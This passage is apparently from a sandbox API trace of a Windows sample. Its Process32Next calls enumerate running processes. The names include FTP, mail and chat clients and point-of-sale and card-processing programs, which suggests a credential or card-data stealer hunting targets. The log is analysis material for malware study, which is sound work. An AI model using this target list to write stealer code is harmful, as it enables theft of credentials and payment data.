th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0225.117] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0225.119] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0225.121] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0225.123] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0225.125] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0225.128] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0225.133] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0225.135] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0225.137] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0225.139] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0225.141] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0225.143] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0225.146] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0225.191] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0225.194] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0225.197] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0225.199] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0225.202] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0225.204] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0225.207] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0225.219] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0225.223] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0225.225] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0225.228] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0225.230] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0225.233] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0225.236] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0225.238] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0225.241] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0225.243] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0225.245] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0225.248] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0225.250] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0225.252] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0225.254] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0225.264] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0225.267] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0225.277] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0225.280] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0225.282] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0225.284] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0225.286] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0225.290] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0225.292] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0225.294] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0225.296] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0225.298] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0225.299] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0225.302] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0225.304] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0225.306] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0225.308] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0225.317] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0225.319] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0225.321] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0225.323] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0225.325] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0225.327] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0225.329] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0225.330] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0225.332] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.334] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.336] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0225.338] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.339] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0225.341] CloseHandle (hObject=0x18ec) returned 1 [0225.341] Sleep (dwMilliseconds=0x64) [0225.460] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x31c [0225.477] Process32First (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.480] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.482] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.484] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.487] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.489] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.491] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.495] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.536] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.538] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.541] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.544] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.546] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.549] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.551] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.554] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.556] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.558] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.561] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, 